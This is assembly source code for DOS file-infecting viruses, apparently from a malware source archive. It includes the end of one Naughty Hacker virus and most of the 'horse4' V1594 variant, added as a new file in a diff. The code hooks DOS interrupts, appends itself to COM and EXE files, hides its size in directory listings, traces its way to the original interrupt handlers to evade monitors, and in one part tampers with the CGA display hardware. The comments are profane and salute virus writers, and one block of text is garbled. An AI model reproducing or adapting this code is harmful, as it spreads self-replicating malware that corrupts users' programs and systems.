MOV AH,3Dh ; If so set AH to OPEN function
JZ Infect ; and infect file
ErrorProcess:
MOV AX,CS:[offset FunCounter] ; Load nomer pored na function
CMP AX,0000 ; If counter is != 0
JNZ AdjustFunCount ; then only decrease counter
JMP VideoFuck ; else go to video fuck
AdjustFunCount:
DEC AX
MOV CS:[04A0h],AX
EndInt21:
POP ES ; Restore important registers
POP DS
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
JMP dword ptr CS:[offset Int21off] ; Jump to DOS
DB 9A ; ??????
CloseFile:
MOV AH,45
Infect:
CALL CallDOS ; Call DOS int 21
JC ErrorProcess ; If error -> Stop processing
MOV BP,AX ; Save file handle in BP
MOV AX,3508 ; Get timer interrupt
CALL CallDOS
MOV CS:[offset TimerOff],BX ; and save it in variable
MOV CS:[offset TimerSeg],ES
PUSH BX ; and to stack
PUSH ES
MOV AL,21 ; Get in21
CALL CallDOS
PUSH BX ; and save it on stack
PUSH ES
MOV AL,24 ; Get critical error int
CALL CallDOS
PUSH BX ; and store it on stack
PUSH ES
MOV AL,13 ; Get int 13 (disk I/O)
CALL CallDOS
PUSH BX ; and save it on stack
PUSH ES
MOV AH,25 ; Now he will SET vectors
LDS DX,dword ptr CS:[offset Int13off] ; Load int13 bios address
CALL CallDOS ; Set it in vector table
MOV AL,21
LDS DX,dword ptr CS:[offset Dos21off] ; Load int21 dos address
CALL CallDOS ; Set in vector table
MOV AL,24 ; Will set critical error handler
PUSH CS
POP DS ; Set DS point to vurus segment
MOV DX,offset CriticalError ; Load its own critical handler
INT 21 ; Set in vector table
MOV AL,08 ; Set new timer
MOV DX,offset TimerHandler ; Load its own timer
INT 21 ; Set in vector table
MOV BX,BP ; Restore file handle from BP to BX
PUSH BX ; Save handle on stack
MOV AX,1220 ; Get handle table number
CALL CallInt2F ; Via int2F (undocumented)
MOV BL,ES:[DI] ; Load table number in BL
MOV AX,1216 ; Get table address
CALL CallInt2F ; Via int2F (undocumented)
POP BX ; Restore file handle
ADD DI,0011 ; ES:DI point to file size
MOV byte ptr ES:[DI-0Fh],02 ; Set file open mode (3Dxx) to Read/Write
MOV AX,ES:[DI] ; Load DX:AX with file size
MOV DX,ES:[DI+02] ;
CMP DX,0000 ; Check if file is less than 64k
JNZ BigEnough ; If less
CMP AX,offset LastCode ; Then check if file is less than virus
JNC BigEnough ; If file is larger than virus -> fuck it
JMP SkipFile ; else skip file
BigEnough:
MOV [offset FileSizeLow],AX ; Save file size in variables
MOV [offset FileSizeHi],DX
SUB AX,offset VirusAuthor-offset EndAuthor ; Decrease file size with sign size
SBB DX,0000 ;
MOV ES:[DI+04],AX ; Set current file position to point
MOV ES:[DI+06],DX ; Virus sign
PUSH DI ; Save table handle table address
PUSH ES ;
MOV AH,3F ; Will read from file
MOV CX,offset EndAuthor-offset VirusAuthor
MOV DX,offset LastByte ; Load DS:DX point AFTER virus
MOV DI,DX ; DI point this area either
INT 21 ; Read file
MOV SI,Offset VirusAuthor ; DS:SI point virus sign
MOV CX,offset EndAuthor-offset VirusAuthor ; Load CX sign size
PUSH CS ; ES:DI point to readed byte
POP ES ;
REP CMPSB ; Compare virus sign with readed bytes
POP ES ; Restore handle table address
POP DI ;
JNZ CleanFile ; If not equal -> file is clean
JMP SkipFile ; Else file infected -> skip it
CleanFile: MOV ES:[DI+04],0000 ; Set file pointer to 0L
MOV ES:[DI+06],0000
MOV AH,3F ; Will read EXE header
MOV CX,001B ; Size of EXE header
MOV DX,offset LastByte ; Read in buffer AFTER virus
MOV SI,DX ; Set DS:SI point to readed header
INT 21 ; Read header
JNC NoErrorHeader ; If no error in read -> go ahead
JMP SkipFile ; If error occur -> skip file
NoErrorHeader: CMP ES:[DI+18],4D4F ; Check in table if file is ?OM
JNZ NoComFile
JMP InfectCOM
NoComFile: CMP ES:[DI+18],4558 ; Check for ?XE file
JZ CheckForEXE ; If so -> infect it
JMP SkipFile ; Else skip file
CheckForEXE: CMP ES:[DI+17],45 ; Check if file is realy an EXE-named
JZ CheckEXEsign ; If so -> check for MZ,ZM
JMP SkipFile ; Else skip file
CheckEXEsign: CMP [SI],5A4Dh ; Check for MZ
JZ InfectEXE ; If so -> infect file
CMP [SI],4D5Ah ; Check for ZM
JZ InfectEXE ; If so -> infect file
JMP SkipFile ; Otherwise -> skip file
InfectEXE: MOV byte ptr [ComFlag],45h ; Set file type flag to EXE
MOV AX,[SI+0Eh] ; Load AX with EXE file SS
MOV [SSegment],AX ; and save it
MOV AX,[SI+14h] ; Load AX with EXE header IP
MOV [IPointer],AX ; and save it
MOV AX,[SI+16h] ; Load AX with EXE header CS
MOV [CSegment],AX ; And save it
MOV DX,offset LastCode ; Load DX with virus CODE size
PUSH DX ; Save it to stack
MOV CX,9h ; Compute virus size in
SHR DX,CL ; 512 pages
ADD [SI+04h],DX ; Increase EXE file header size field
; with virus pages
POP DX ; Restore virus size in DX
AND DX,01FFh ; Compute reminder from VirusSize/512
ADD DX,[SI+02] ; Save value in EXE header
CMP DX,0200 ; Check virus reminder
JL NoAdjustRem ; If less than 512 -> no adjust
SUB DX,0200 ; Else decrease reminder
INC word ptr [SI+04] ; Increase EXE header page count
NoAdjustRem:
MOV [SI+02],DX ; Save correct reminder in EXE header
MOV AX,[SI+08] ; Load AX with file size in paragraphs
SUB DX,DX ; Set DX to Zero
CALL LongMultiple16 ; Get DX:AX file size in bytes
SUB [offset FileSizeLow],AX ; Correct saved file size
SBB [offset FileSizeHi],DX
MOV AX,[FileSizeLow] ; Load DX:AX with corrected file size
MOV DX,[offset FileSizeHi]
CALL LongMultiple16 ; DX:AX *= 0x10
MOV CX,0008 ; Calculate new entry CS:IP
SHL DX,CL ; DX/=0x100
MOV CX,0004
SHR AX,CL ; AX/=0x10
MOV [SI+14],AX ; Set entry CS:IP to EXE header
MOV [SI+16],DX
MOV [NewCS],DX ; Save new entry CS
ADD DX,0200 ; Calculate new entry SS
MOV [SI+0E],DX ; Store it to EXE header
DoInfect:
MOV ES:[DI+04],0000 ; Set file pointer to 0L
MOV ES:[DI+06],0000
PUSH ES:[DI-02] ; Save file date/time on stack
PUSH ES:[DI-04]
SUB CX,CX ; Set CX to 0
XCHG CX,ES:[DI-0Dh] ; Load CX file attrib/set file attrib to 0
PUSH CX ; Save file attrib to stack
MOV AH,40 ; Write file
MOV DX,offset LastByte ; EXE header
MOV CX,001B ; Rewrite modified EXE header
INT 21 ; Do write
JC BadWrite ; If error skip file
MOV AX,ES:[DI] ; Set file pointer
MOV ES:[DI+04],AX
MOV AX,ES:[DI+02] ; to end of file
MOV ES:[DI+06],AX ;
MOV AH,40 ; Will write
SUB DX,DX ; Virus offset
MOV CX,offset LastCode ; Virus size
INT 21 ; Write virus to EXE file
BadWrite:
POP CX ; Restore file attrib from stack
MOV ES:[DI-0Dh],CX ; Set attrib of file
POP CX ; Restore file date/time from stack
POP DX
OR byte ptr ES:[DI-0Bh],40 ; Set DO NOT UPDATE TIME flag in table
JC NoFuckTime ; If write error -> Set normal time
OR CX,001F ; Else set file seconds to 62
NoFuckTime:
MOV AX,5701 ; Set file date/time
INT 21 ; Via int21
SkipFile:
MOV AH,3E ; CloseFile
INT 21
OR byte ptr ES:[DI-0Ch],40 ; ????
SUB AX,AX ; Set DS to 0
MOV DS,AX
POP AX ; Restore int 13 seg
MOV [004E],AX ; Restore vector 13 seg
POP AX ; Restore int 13 off
MOV [004C],AX ; Restore vector 13 off
POP AX ; Restore int 24 seg
MOV [0092],AX ; Restore vector 24 seg
POP AX ; Restore int 24 off
MOV [0090],AX ; Restore vector 24 off
POP AX ; Restore int 21 seg
MOV [0086],AX ; Restore vector 21 seg
POP AX ; Restore int 21 off
MOV [0084],AX ; Restore vector 21 off
POP AX ; Restore int 8 seg
MOV [0022],AX ; Restore vector 8 seg
POP AX ; Restore int 8 off
MOV [0020],AX ; Restore vector 0 off
JMP ErrorProcess ; Update counter
InfectCom:
TEST byte ptr ES:[DI-0Dh],04 ; Check for SYSTEM file
JNZ OkComFile ; If file IS system -> Damage file ?????
PUSH SI ; Save buffer offset
CMP ES:[DI+17],43 ; Check if file ext begin with 'C'
JNZ OkComFile ; If no -> damage file
MOV byte ptr [ComFlag],43 ; Set file type flag to COM
LODSW ; Load first 2 bytes of file
MOV CS:[First3],AX ; And save them
LODSW ; Load seconf 2 bytes of file
MOV CS:[First3+2],AX ; And save them
MOV AX,ES:[DI] ; Load AX with file size
CMP AX,0FA76h ; Check file size
POP SI ; Restore buffer offset
JC OkComFile ; If file is less than 64118 bytes -> OK infect
JMP short SkipFile ; else skip file
OkComFile:
SUB AX,0003 ; Calculate jump argument
MOV byte ptr [SI],0E9h ; Set first instruction to near JMP
MOV [SI+01],AX ; Store JMP argument
JMP DoInfect ; Go write buffer
LongMultiple16:
PUSH CX ; Save CX
MOV CX,0004 ; Will repeat 4 times
DoMult:
SHL AX,1 ; Mult DX:AX * 2
RCL DX,1 ;
LOOP DoMult ; Repeat 4 times -> 2^4 = 16
POP CX ; Restore CX
RET ; Return to caller
SetUp:
MOV AH,52 ; Get DOS's table of table address
INT 21 ; in ES:BX
MOV CS:[Offset TableSegment],es ; Save table segment
; Virus treat this segment as DOS segment
; He assume int21 seg == to DOS segment
; That's why virus will fail on DOS 5.X
CLI ; Disable interrupts
SUB AX,AX ; Set AX to 0
MOV DS,AX ; Set DS point to interrupt vectors
MOV [0004],offset Debugger ; Set vector 1 (trap) offset
MOV [0006],CS ; ; Set vector 1 (trap) seg
MOV AX,[00BC] ; Load int2F off
MOV CS:[offset Int2Foff],AX ; and save it
MOV AX,[00BE] ; Load int2F seg
MOV CS:[offset Int2Fseg],AX ; and save it
STI ; Enable interrupts
PUSHF ; Save flags
PUSHF ; Save flags
POP AX ; Get flags in AX
OR AX,0100 ; Set TF to 1 (trace mode)
PUSH AX ; Put flags back to stack
POPF ; Begin trace
SUB AX,AX ; AX = 0
DEC AH ; AX = FF00 ???
CALL dword ptr [0084] ; Call DOS (trace mode active)
MOV SI,0004 ; SI = 4
MOV DS,SI ; DS = SI = 4
MOV AH,30 ; Get DOS version
INT 21 ; Via int21
CMP AX,1E03 ; Check DOS 3.30
LES AX,[SI+08] ; Load ES:AX with int13 address
JB OkInt13 ; If DOS vers < 3.30 -> ignore BIOS address load/check
LES AX,[0770+SI] ; then load ES:DX with BIOS address of int13
; simulate int2F, AH=13
MOV BX,ES ; BX:AX int13 BIOS address
CMP BX,0C800h ; If int13 seg >= C800
JAE OkInt13 ; Then address is in BIOS, all OK
CLI ; else HALT system
HLT
OkInt13:
MOV CS:[offset Int13off],AX ; Save in13 address
MOV CS:[offset Int13seg],ES
IRET ; Return to caller, setup complete
Debugger:
PUSH BP ; Save BP
MOV BP,SP ; BP point to stack top
PUSH BX ; Save BX
MOV BX,CS:[offset TableSegment] ; Load BX with DOS segment
CMP SS:[BP+04],BX ; Check debugged address
JNZ ContinueDebug ; If not in DOS -> continue
MOV BX,SS:[BP+02] ; else load BX with int21 off
MOV CS:[offset Dos21off],BX ; and save it
AND SS:[BP+06],0FEFFh ; Clear trap flag
ContinueDebug:
POP BX ; Restore BX
POP BP ; Restore BP
IRET ; Continue trace if require or
; continue int21 execution without trace
; Next subroutine fuck you CGA display (don't affect EGA).
; Fucking result could be fix by dos MODE command
VideoFuck:
MOV DX,03D4h ; Select CGA register selector
MOV AL,02 ; Select CRT register 2 (horiz sync)
OUT DX,AL ; Do selection
MOV AL,0FFh ; New sync value
MOV DX,03D5h ; Select CGA register value writer
; This could be INC DX; That save 1 byte
OUT DX,AL ; Fuck horiz sync
JMP EndInt21 ; Terminate int21 request
CallDOS:
PUSHF ; Save flags
CALL dword ptr CS:[offset Dos21off] ; Call ORIGINAL int21
RET ; Return to caller
CallInt2F:
PUSHF ; Save flags
CALL dword ptr CS:[offset Int2Foff] ; Call SAVED int2F
RET ; Return to caller
TimerHandler:
PUSHF ; Save flags
CALL dword ptr CS:[offset TimerOff] ; Call original timer
PUSH AX ; Save AX
PUSH DS ; Save DS
SUB AX,AX ; Set DS to interrupt table
MOV DS,AX
CLI ; Disable interrupts
MOV AX,CS:[offset Int13off] ; Restore int13 address
MOV [004C],AX
MOV AX,CS:[offset Int13seg]
MOV [004E],AX
MOV [0020],offset TimerHandler ; Set int8
MOV [0022],CS
MOV AX,CS:[offset Dos21off] ; Restore int21 address
MOV [0084],AX
MOV AX,CS:[offset TableSegment]
MOV [0086],AX
MOV AX,offset CriticalError ; Set int24
MOV [0090],AX
MOV [0092],CS
STI ; Enable interrupts
POP DS ; Restore DS
POP AX ; Restore AX
IRET ; Terminate timing
CriticalError:
MOV AL,03 ; If critical error
IRET ; then simulate Ignore
VirusAuthor:
db 'Sofia,Feb '
db 27h
db '91 Naughty Hacker.' ; Replace this string with HORSE
EndAuthor:
LastCode label byte ; This is virus in file
Int21off: DW 0 ; Variable area
Int21seg: DW 0 ; NOT writed in file
Int2Foff: DW 0
Int2Fseg: DW 0
TimerOff: DW 0
TimerSeg: DW 0
Int13off: DW 0
Int13seg: DW 0
Dos21off: DW 0
TableSegment: DW 0
FileSizeLow: DW 0
FileSizeHi: dw 0
FunCounter: dw 0 ; Executed function counter
LastByte: label byte ; Memory size of virus

958
MSDOS/Virus.MSDOS.Unknown.horse4.asm Normal file
View File

@ -0,0 +1,958 @@
.radix 16
;*********************************
;* The Naughty Hacker's virus *
;*VERSION 3.1 (And not the last.)*
;* ( V1594 ) *
;* Finished on the 10.04.1991 *
;* *
;* Glad to meet you friend! *
;* *
;*********************************
;
; "It's hard to find a black cat in a dark room, especially if it's not there."
;
; <20>°¥¤ ¢ ± ±²®¨ ®°¨£¨­ «­¨¿ ²¥ª±² ­  V1594 ( ª® ¬®¦¥ ² ª  ¤  ª ¦¥ !@!?!).
; €¢²®°º² (Š®­¿) ¯°¥¤¢ °¨²¥«­® ¯°¥¤³¯°¥¦¤ ¢ ,·¥ ­¥ ¦¥« ¥ ²®§¨ ²¥ª±² ¤  ¡º¤¥
; ¯°®¬¥­¿­ ¯® ­¨ª ªº¢ ­ ·¨­, ­®  ª® ¦¥« ¥²¥ ¤  £® ³±º¢º°¸¥­±²¢ ²¥ ¬®¦¥ ¤ 
; ­ ¯° ¢¨²¥ ²®¢  ­ ¯º«­® ±¢®¡®¤­® ¯°¨ ¥¤¨­±²¢¥­®²® ³±«®¢¨¥, ·¥ ¢ ¯®«³·¥­ ² 
; ­®¢  ¢¥°±¨¿ ­¿¬  ¤  ¨¬  ­¨ª ª¢¨ ° §°³¸¨²¥«­¨ ´³­ª¶¨¨.
; €¢²®°º² ­¥ ¯®¥¬  ­¨ª ª¢  ®²£®¢®°­®±² §  ¹¥²¨ ¯°¨·¨­¥­¨ ®² ˆ<E2809A>€ ......
;
; „  ±¥ ª®¬¯¨«¨°  ­  TURBO ASSEMBLER Ver 1.03B. ’ ª  ¯®«³·¥­¨¿ ª®¤ ¥ £®²®¢
; §  ±² °²¨° ­¥ ¨ ....
;
; <20>®§¤° ¢¨ ¤® ¢±¨·ª¨ VIRUSWRITERS !
;
;
; To be continued ...
;
call Start_Virus
mov dx,offset Hellomsg
mov ah,9
int 21
int 20
Hellomsg db 0a,0dh,7,'HI WORLD,GIVE ME COMMAND.COM !!!',0a,0dh,7,'$'
Virus_lenght equ endcode-adjust
alllen equ buffer-adjust
adjust label word
IP_save label word
First_3 Label Byte
;For .COM file here stores
ret
nop
nop
CS_save dw ? ;The first 3 bytes
SP_save dw ?
SS_save dw 0FFFF ;0FFFF For COM files
signature:
db 'N.Hacker' ;It's me the HORSE !!!
date_stamp:
dd 10041991 ;10.04.1991
Run_The_Program:
pop ds ;Restore saved ds,es,ax
pop es ;ds=es=PSP
pop ax
cmp cs:[bp+SS_save-adjust],0FFFF ;Run the infected program
je Run_COM_File
mov ax,ds ;Calculate load segment
add ax,10
mov bx,ax
add ax,cs:[bp+CS_save-adjust] ;Calculate CS value
add bx,cs:[bp+SS_save-adjust] ;Calculate SS value
mov ss,bx ;Run .EXE program
mov sp,word ptr cs:[bp+SP_save-adjust]
push ax
push word ptr cs:[bp+IP_save-adjust]
retf
Run_COM_File:
mov di,100
mov si,bp
movsb ;Restore the first 3 bytes
movsw ;Run .COM program
mov bx,100
push bx
sub bh,bh
ret
;*******************************************************************
; *
; This is the program entry.... *
; *
;*******************************************************************
Start_Virus:
call Get_IP ;This is to get the IP value.
Get_IP:
pop bp ;Get it in BP.
sub bp,Get_IP-adjust ;adjust BP point to the begining
cld ;Clear direction flag
push ax ;Save some registres
push es
push ds
mov es,[2] ;get last segment
mov di,Run_The_Program-adjust ;(last segment=segment of virus)
push ds
push cs
pop ds
mov si,di
add si,bp
mov cx,endcode-Run_The_Program
rep cmpsb ;check if virus is in memory
pop ds
push ds
pop es
je Run_The_Program ;If so then run the program
mov word ptr cs:[bp+handle-adjust],0ffff ;set handle_save
mov ax,ds
dec ax
mov ds,ax ;ds=MCB
sub word ptr [3],80 ;Set block size
sub word ptr [12],80 ;Set last segment
mov es,[12] ;steal some memory (2K)
push cs
pop ds
sub di,di
mov si,bp ;prepare to move in high mem
mov cx,alllen ;will move virus+variables
rep movsb ;copy there
push cs
mov ax,Run_The_Program-adjust
add ax,bp
push ax
push es
mov ax,offset Set_Vectors-adjust ;Set vectors
push ax
retf
Find_First_Next:
call Call_Original_INT_21h ;fuck when do the dir command
push bx
push es
push ax
or al,al
jnz Go_Out_ ;if error
mov ah,2f ;get DTA address
int 21
mov al,byte ptr es:[bx+30d] ;Seconds in al
and al,31d ;Mask seconds
cmp al,60d/2 ;Seconds=60?
jne Go_Out_
mov ax,es:[bx+36d]
mov dx,es:[bx+38d] ;Check File size
cmp ax,Virus_lenght*2
sbb dx,0
jb Go_Out_
Adjust_Size:
sub es:[bx+28d+7+1],Virus_lenght ;Adjust size
sbb es:[bx+28d+2+7+1],0
Go_Out_:
pop ax
pop es ;Return to caller
pop bx
iret
Find_First_Next1:
call Call_Original_INT_21h
pushf
push ax
push bx ;fuck again
push es
jc Go_Out_1
mov ah,2f
int 21
mov al,es:[bx+22d]
and al,31d
cmp al,60d/2
jne Go_Out_1
mov ax,es:[bx+26d]
mov dx,es:[bx+28d]
cmp ax,Virus_lenght*2
sbb dx,0
jb Go_Out_1
Adjust_Size1:
sub es:[bx+26d],Virus_lenght
sbb es:[bx+28d],0
Go_Out_1:
pop es
pop bx
pop ax ; Dummy proc far
popf ; ret 2
db 0ca,2,0 ;retf 2 ; Dummy endp => BUT too long...
;*************************************
; *
; Int 21 entry point. *
; *
;*************************************
INT_21h_Entry_Point:
cmp ah,11
je Find_First_Next ;Find First Next (old)
cmp ah,12
je Find_First_Next
cmp ah,4e ;Find First Next (new)
je Find_First_Next1
cmp ah,4f
je Find_First_Next1
cmp ah,6ch
jne not_create ;Create (4.X)
test bl,1
jz not_create
jnz create
not_create:
cmp ah,3ch ;Create (3.X)
je create
cmp ah,5bh
je create
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov byte ptr cs:[function-adjust],ah
cmp ah,6ch ;Open (4.X)
je create_
cmp ah,3e ;Close
je close_
cmp ax,4b00 ;Exec
je Function_4Bh
cmp ah,17 ;Rename (old)
je ren_FCB
cmp ah,56 ;Rename (new)
je Function_4Bh
cmp ah,43 ;Change attributes
je Function_4Bh
cmp ah,3dh ;Open (3.X)
je open
Return_Control:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
Go_out:
jmp dword ptr cs:[current_21h-adjust] ;go to the old int 21
create_:
or bl,bl ;Create file?
jnz Return_Control
mov dx,si
jmp Function_4Bh
ren_FCB:
cld
inc dx
mov si,dx
mov di,offset buffer-adjust
push di
push cs
pop es ;Convert FCB format Fname into ASCIIZ string
mov cx,8
rep movsb
mov al,'.'
stosb
mov cx,3
rep movsb
sub al,al
stosb
pop dx
push cs
pop ds
jmp Function_4Bh
create:
; cmp word ptr cs:[handle-adjust],0ffff
; jne Go_out
call Call_Original_INT_21h
jc Error
mov word ptr cs:[handle-adjust],ax
jnc Exit_
Error:
mov word ptr cs:[handle-adjust],0ffff ;Useless
Exit_:
; retf 2
db 0ca,2,0
close_:
cmp word ptr cs:[handle-adjust],0ffff
je Return_Control
cmp bx,word ptr cs:[handle-adjust]
jne Return_Control
mov ah,45
call Infect_It
mov word ptr cs:[handle-adjust],0ffff
jmp Return_Control
Function_4Bh:
mov ax,3d00h
open:
call Infect_It
jmp Return_Control
;******************************************
; *
; This infects the programs... *
; *
;******************************************
Infect_It:
call Call_Original_INT_21h ;this is the infecting part
jnc No_error
ret
No_error:
xchg ax,bp
mov byte ptr cs:[flag-adjust],0
mov ah,54
call Call_Original_INT_21h
mov byte ptr cs:[veri-adjust],al
cmp al,1 ;Switch off verify...
jne Go_On_Setting
mov ax,2e00
call Call_Original_INT_21h
Go_On_Setting:
push cs
push cs
pop ds
pop es
mov dx,offset DOS_13h-adjust
mov bx,dx ;Set New DOS int 13h
mov ah,13
call Call_Original_INT_2Fh
mov ax,3513
call Call_Original_INT_21h
push bx
push es
mov word ptr cs:[current_13h-adjust],bx
mov word ptr cs:[current_13h-adjust+2],es
mov ah,25
mov dx,INT_13h_entry-adjust ;Set int 13h
push cs
pop ds
call Call_Original_INT_21h
mov ax,3524
call Call_Original_INT_21h
push bx
push es
mov ah,25
mov dx,INT_24h_entry-adjust ;Set int 24h (Useless maybe...).
call Call_Original_INT_21h
xchg bx,bp
push bx
mov ax,1220
call Call_Original_INT_2Fh
mov bl,es:[di] ;Remember the good old V512 ?
mov ax,1216
call Call_Original_INT_2Fh
pop bx
add di,11
mov byte ptr es:[di-15d],2
mov ax,es:[di]
mov dx,es:[di+2]
cmp ax,Virus_lenght+1
sbb dx,0
jnb Go_on
jmp close
Go_on:
cmp byte ptr cs:[function-adjust],3dh
je Scan_name
cmp byte ptr cs:[function-adjust],6ch
jne Dont_Scan_Name
Scan_name:
push di
add di,0f
mov si,offset fname-adjust ;wasn't that the last opened file?
cld
mov cx,8+3
rep cmpsb
pop di
jne Dont_Scan_Name
jmp close
Dont_Scan_Name:
cmp es:[di+18],'MO'
jne Check_For_EXE ;check for .COM file
cmp byte ptr es:[di+17],'C'
jne Check_For_EXE
jmp com
Check_For_EXE:
cmp es:[di+18],'EX'
jne Not_good ;check for .EXE file
cmp byte ptr es:[di+17],'E'
je Check_For_Valid_EXE
Not_good:
jmp close
Check_For_Valid_EXE:
call Read_First_18
cmp word ptr [si],'ZM'
je Valid_EXE ;check for valid .EXE file
cmp word ptr [si],'MZ'
je Valid_EXE
jmp close
Valid_EXE:
cmp word ptr [si+0c],0ffff ;only low-mem .EXE
je Low_Mem
jmp close
Low_Mem:
mov cx,[si+16]
add cx,[si+8] ;Something common with EDDIE..
mov ax,10
mul cx
add ax,[si+14]
adc dx,0
mov cx,es:[di]
sub cx,ax
xchg cx,ax
mov cx,es:[di+2]
sbb cx,dx
or cx,cx
jnz Not_Infected_EXE ;infected?
cmp ax,(endcode-Start_Virus)
jne Not_Infected_EXE
jmp close
Not_Infected_EXE:
mov ax,[si+10]
mov [SP_save-adjust],ax
mov ax,[si+0e]
mov [SS_save-adjust],ax
mov ax,[si+14]
mov [IP_save-adjust],ax
mov ax,[si+16]
mov [CS_save-adjust],ax ;set the new header
mov ax,es:[di]
mov dx,es:[di+2]
add ax,Virus_lenght
adc dx,0
mov cx,200 ;(C) by Lubo & Jan...
div cx
mov [si+2],dx
or dx,dx
jz OK_MOD
inc ax
OK_MOD:
mov [si+4],ax
mov ax,es:[di]
mov dx,es:[di+2]
mov cx,4
push ax
Compute:
shr dx,1
rcr ax,1
loop Compute
pop dx
and dx,0f
sub ax,[si+8]
add dx,Start_Virus-adjust
adc ax,0
mov [si+14],dx
mov [si+16],ax
add ax,(Virus_lenght)/16d+1
mov [si+0eh],ax
mov [si+10],100
write:
mov ax,5700
call Call_Original_INT_21h
push cx
push dx
sub cx,cx
mov es:[di+4],cx
mov es:[di+6],cx
mov cl,20
xchg cl,byte ptr es:[di-0dh]
push cx
mov ah,40 ;this writes the first few bytes and glues the virus
mov dx,buffer-adjust
mov cx,18
call Call_Original_INT_21h
mov ax,es:[di]
mov es:[di+4],ax
mov ax,es:[di+2]
mov es:[di+6],ax
call Check_For_COMMAND ;(C)
jne Dont_Adjust_Size
sub es:[di+4],Virus_lenght
sbb es:[di+6],0 ;???????????????????????????????
Dont_Adjust_Size:
mov ah,40
sub dx,dx
mov cx,Virus_lenght
call Call_Original_INT_21h
pop cx
mov byte ptr es:[di-0dh],cl
pop dx
pop cx
cmp byte ptr cs:[flag-adjust],0ff
je Set_Time_and_Date
exit:
call Check_For_COMMAND
je Set_Time_and_Date
and cl,11100000b
or cl,60d/2
Set_Time_and_Date:
mov ax,5701
call Call_Original_INT_21h
close:
mov ah,3e
call Call_Original_INT_21h
push es
pop ds
mov si,di
add si,0f
mov di,fname-adjust
push cs
pop es
mov cx,8+3 ;save the fname to a quit place
cld
rep movsb
push cs
pop ds
cmp byte ptr cs:[flag-adjust],0ff
jne Dont_Clear_Buffers
mov ah,0dh ;if error occured->clear disk buffers
call Call_Original_INT_21h
Dont_Clear_Buffers:
les bx,[org_13h-adjust]
lds dx,[org_13h-adjust]
mov ah,13
call Call_Original_INT_2Fh
cmp byte ptr cs:[veri-adjust],1
jne Restore_Vectors
mov ax,2e01
call Call_Original_INT_21h
Restore_Vectors:
sub ax,ax
mov ds,ax
pop [24*4+2]
pop [24*4]
pop [13*4+2]
pop [13*4] ;restore vectors and return
ret
com:
test byte ptr es:[di-0dh],4 ;if it is a system file
jnz Not_OK_COM_File ;I had some problems here with
;V1160 & V1776 (with the ball)
cmp es:[di],65535d-Virus_lenght*2-100
ja Not_OK_COM_File
call Read_First_18
cmp byte ptr [si],0E9
jne OK_COM_file
mov ax,es:[di]
sub ax,[si+1] ;infected?
cmp ax,(endcode-Start_Virus+3)
je Not_OK_COM_File
OK_COM_file:
mov word ptr [SS_save-adjust],0FFFF
push si
lodsb
mov word ptr [First_3-adjust],ax
lodsw
mov word ptr [First_3-adjust+1],ax
pop si
mov ax,es:[di]
add ax,Start_Virus-adjust-3
call Check_For_COMMAND
jne Normally
sub ax,Virus_lenght
Normally:
mov byte ptr [si],0E9
mov word ptr [si+1],ax
jmp write
Not_OK_COM_File:
jmp close
Set_Vectors:
sub ax,ax
mov ds,ax
push [1*4]
push [1*4+2] ; <= (C) by N.Hacker.
pushf
pushf
pushf
pushf
mov byte ptr cs:[flag-adjust],ah
mov byte ptr cs:[my_flag-adjust],ah
mov word ptr cs:[limit-adjust],300
mov word ptr cs:[mem_-adjust],org_21h-adjust
mov [1*4],offset trap-adjust
mov [1*4+2],cs
call set_trace
mov ax,3521
call dword ptr [21h*4]
mov byte ptr cs:[flag-adjust],0
mov word ptr cs:[mem_-adjust],org_2fh-adjust
call set_trace
mov ax,1200
call dword ptr [2fh*4] ;do trace int 2f
mov byte ptr cs:[flag-adjust],0
mov byte ptr cs:[my_flag-adjust],0FF
mov word ptr cs:[limit-adjust],0C800
mov word ptr cs:[mem_-adjust],org_13h-adjust
call set_trace
sub ax,ax
mov dl,al
call dword ptr [13h*4] ;do trace int 13
mov byte ptr cs:[flag-adjust],0
mov word ptr cs:[limit-adjust],0F000
mov word ptr cs:[mem_-adjust],Floppy_org_13h-adjust
call set_trace
sub ax,ax
mov dl,al
call dword ptr [13h*4]
pop [1*4+2]
pop [1*4]
les ax,[21*4]
mov word ptr cs:[current_21h-adjust],ax ;get old int 21
mov word ptr cs:[current_21h-adjust+2],es
mov [21*4], INT_21h_Entry_Point-adjust ;set it
mov [21*4+2],cs
retf
set_trace:
pushf
pop ax
or ax,100
push ax
popf
ret
trap:
push bp
mov bp,sp
push bx
push di
cmp byte ptr cs:[flag-adjust],0ff
je off
mov di,word ptr cs:[mem_-adjust]
mov bx,word ptr cs:[limit-adjust]
cmp [bp+4],bx
pushf
cmp word ptr cs:[my_flag-adjust],0ff
jne It_Is_JA
popf
jb Go_out_of_trap
jmp It_Is_JB
It_Is_JA:
popf
ja Go_out_of_trap
It_Is_JB:
mov bx,[bp+2]
mov word ptr cs:[di],bx
mov bx,[bp+4]
mov word ptr cs:[di+2],bx
mov byte ptr cs:[flag-adjust],0ff
off:
and [bp+6],0feff
Go_out_of_trap:
pop di
pop bx
pop bp
iret
Call_Original_INT_21h:
pushf
call dword ptr cs:[org_21h-adjust]
ret
Call_Original_INT_2Fh:
pushf
call dword ptr cs:[org_2fh-adjust]
ret
INT_24h_entry:
mov al,3
iret
;**************************
; (C) by N.Hacker. *
; (bellow) *
;**************************
INT_13h_entry:
mov byte ptr cs:[next_flag-adjust],0
cmp ah,2
jne Other
cmp byte ptr cs:[function-adjust],03Eh
jne Dont_hide
dec byte ptr cs:[next_flag-adjust]
inc ah
jmp Dont_hide
Other:
cmp ah,3
jne Dont_hide
cmp byte ptr cs:[flag-adjust],0ff
je no_error_
cmp byte ptr cs:[function-adjust],03Eh
je Dont_hide
inc byte ptr cs:[next_flag-adjust]
dec ah
Dont_hide:
pushf
call dword ptr cs:[current_13h-adjust]
jnc no_error_
mov byte ptr cs:[flag-adjust],0ff
no_error_:
clc
db 0ca,02,0 ;retf 2
DOS_13h:
cmp byte ptr cs:[next_flag-adjust],0
je OK
cmp ah,2
je Next
cmp ah,3
jne OK
Next:
cmp byte ptr cs:[next_flag-adjust],1
jne Read
inc ah
jne OK
Read:
dec ah
OK:
test dl,80
jz Floppy
jmp dword ptr cs:[org_13h-adjust]
Floppy:
jmp dword ptr cs:[Floppy_org_13h-adjust]
Read_First_18:
sub ax,ax
mov es:[di+4],ax
mov es:[di+6],ax
mov ah,3f
mov cx,18
mov dx,buffer-adjust
mov si,dx
call Call_Original_INT_21h
ret
Check_For_COMMAND:
